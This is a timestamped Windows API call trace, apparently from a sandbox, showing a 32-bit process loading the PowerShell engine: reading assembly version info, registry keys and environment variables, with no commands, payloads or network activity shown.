	[0202.207] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x458
	[0202.207] GetLastError () returned 0x0
	[0202.207] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x29e570 | out: lpdwProcessId=0x29e570) returned 0x778
	[0202.208] GetLastError () returned 0x0
	[0202.208] GetLastError () returned 0x0
	[0202.367] WerSetFlags () returned 0x0
	[0202.376] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0202.379] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x29e94c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x29e948 | out: pulNumLanguages=0x29e94c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x29e948) returned 1
	[0202.379] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x29e94c, pwszLanguagesBuffer=0x2ad85b0, pcchLanguagesBuffer=0x29e948 | out: pulNumLanguages=0x29e94c, pwszLanguagesBuffer=0x2ad85b0, pcchLanguagesBuffer=0x29e948) returned 1
	[0202.385] GetUserDefaultLocaleName (in: lpLocaleName=0x7a4288, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0202.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.488] GetLastError () returned 0xcb
	[0202.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.492] GetLastError () returned 0xcb
	[0202.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.494] GetLastError () returned 0xcb
	[0202.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e3bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.509] GetLastError () returned 0xcb
	[0202.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.509] GetLastError () returned 0xcb
	[0202.509] SetErrorMode (uMode=0x1) returned 0x1
	[0202.509] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x29e858 | out: lpFileInformation=0x29e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0202.510] GetLastError () returned 0xcb
	[0202.510] SetErrorMode (uMode=0x1) returned 0x1
	[0202.510] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x29e8dc | out: lpdwHandle=0x29e8dc) returned 0x94c
	[0202.511] GetLastError () returned 0x0
	[0202.511] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2adaae0 | out: lpData=0x2adaae0) returned 1
	[0202.511] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29e8a8, puLen=0x29e8a4 | out: lplpBuffer=0x29e8a8*=0x2adab7c, puLen=0x29e8a4) returned 1
	[0202.512] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adac58, puLen=0x29e820) returned 1
	[0202.512] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0202.512] lstrcpyW (in: lpString1=0x7a4288, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0202.512] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adacac, puLen=0x29e820) returned 1
	[0202.512] lstrlenW (lpString="System.Management.Automation") returned 28
	[0202.512] lstrcpyW (in: lpString1=0x7a4288, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0202.512] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adad08, puLen=0x29e820) returned 1
	[0202.512] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0202.512] lstrcpyW (in: lpString1=0x7a4288, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0202.512] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adad48, puLen=0x29e820) returned 1
	[0202.512] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0202.512] lstrcpyW (in: lpString1=0x7a4288, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0202.512] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adadb0, puLen=0x29e820) returned 1
	[0202.512] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0202.512] lstrcpyW (in: lpString1=0x7a4288, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0202.513] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adae4c, puLen=0x29e820) returned 1
	[0202.513] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0202.513] lstrcpyW (in: lpString1=0x7a4288, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0202.513] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adaeb0, puLen=0x29e820) returned 1
	[0202.513] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0202.513] lstrcpyW (in: lpString1=0x7a4288, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0202.513] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adaf2c, puLen=0x29e820) returned 1
	[0202.513] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0202.513] lstrcpyW (in: lpString1=0x7a4288, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0202.513] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x2adabd4, puLen=0x29e820) returned 1
	[0202.513] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0202.514] lstrcpyW (in: lpString1=0x7a4288, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0202.514] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x0, puLen=0x29e820) returned 0
	[0202.514] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x0, puLen=0x29e820) returned 0
	[0202.514] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x29e824, puLen=0x29e820 | out: lplpBuffer=0x29e824*=0x0, puLen=0x29e820) returned 0
	[0202.514] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29e818, puLen=0x29e814 | out: lplpBuffer=0x29e818*=0x2adab7c, puLen=0x29e814) returned 1
	[0202.514] VerLanguageNameW (in: wLang=0x0, szLang=0x7a4288, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0202.514] VerQueryValueW (in: pBlock=0x2adaae0, lpSubBlock="\\", lplpBuffer=0x29e82c, puLen=0x29e828 | out: lplpBuffer=0x29e82c*=0x2adab08, puLen=0x29e828) returned 1
	[0202.617] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.617] GetLastError () returned 0xcb
	[0202.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.623] GetLastError () returned 0xcb
	[0202.653] lstrlenW (lpString="䅁") returned 1
	[0202.658] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e7f0 | out: phkResult=0x29e7f0*=0x32c) returned 0x0
	[0202.659] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e7f4 | out: phkResult=0x29e7f4*=0x330) returned 0x0
	[0202.659] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e828 | out: phkResult=0x29e828*=0x334) returned 0x0
	[0202.661] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e868, lpData=0x0, lpcbData=0x29e864*=0x0 | out: lpType=0x29e868*=0x1, lpData=0x0, lpcbData=0x29e864*=0x56) returned 0x0
	[0202.664] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29e868, lpData=0x7a4288, lpcbData=0x29e864*=0x56 | out: lpType=0x29e868*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x29e864*=0x56) returned 0x0
	[0202.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.668] GetLastError () returned 0x0
	[0202.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.671] GetLastError () returned 0x0
	[0202.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0202.899] GetLastError () returned 0x0
	[0202.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0202.914] GetLastError () returned 0xcb
	[0204.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.038] GetLastError () returned 0x2
	[0204.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0204.038] GetLastError () returned 0x2
	[0204.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.357] GetLastError () returned 0xcb
	[0204.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.359] GetLastError () returned 0xcb
	[0204.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.496] GetLastError () returned 0xcb
	[0204.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.497] GetLastError () returned 0xcb
	[0204.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0204.497] GetLastError () returned 0xcb
	[0207.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0207.062] GetLastError () returned 0x0
	[0207.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0207.062] GetLastError () returned 0x0
	[0207.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0207.085] GetLastError () returned 0xcb
	[0207.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0207.086] GetLastError () returned 0xcb
	[0207.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0207.349] GetLastError () returned 0x7e
	[0207.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0207.349] GetLastError () returned 0x7e
	[0209.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0209.772] GetLastError () returned 0x2
	[0209.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0209.772] GetLastError () returned 0x2
	[0211.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0211.423] GetLastError () returned 0x57
	[0211.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0211.424] GetLastError () returned 0x57
	[0212.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0212.901] GetLastError () returned 0x2
	[0212.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0212.902] GetLastError () returned 0x2
	[0215.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0215.504] GetLastError () returned 0x2
	[0215.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x29e330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0215.504] GetLastError () returned 0x2
	[0216.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0216.353] GetLastError () returned 0xcb
	[0216.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e3f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0216.355] GetLastError () returned 0xcb
	[0216.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e3a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0216.356] GetLastError () returned 0xcb
	[0216.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e3a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0216.356] GetLastError () returned 0xcb
	[0216.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e3a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0216.364] GetLastError () returned 0xcb
	[0217.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x29e33c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0217.063] GetLastError () returned 0x2
	[0217.063] SetErrorMode (uMode=0x1) returned 0x1
	[0217.063] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x29e7e4 | out: lpFileInformation=0x29e7e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0217.063] GetLastError () returned 0x2
	[0217.063] SetErrorMode (uMode=0x1) returned 0x1
	[0222.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e3f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.510] GetLastError () returned 0x0
	[0222.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e3a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.510] GetLastError () returned 0x0
	[0222.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e3a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.511] GetLastError () returned 0x0
	[0222.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.514] GetLastError () returned 0xcb
	[0222.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.517] GetLastError () returned 0xcb
	[0222.517] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.517] GetLastError () returned 0xcb
	[0222.520] CoCreateGuid (in: pguid=0x29e8c4 | out: pguid=0x29e8c4*(Data1=0x79a40e3b, Data2=0x4f2, Data3=0x4458, Data4=([0]=0xb7, [1]=0x14, [2]=0xdc, [3]=0x7d, [4]=0x94, [5]=0xef, [6]=0xf0, [7]=0x2c))) returned 0x0
	[0222.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.523] GetLastError () returned 0xcb
	[0222.526] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.526] GetLastError () returned 0xcb
	[0222.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
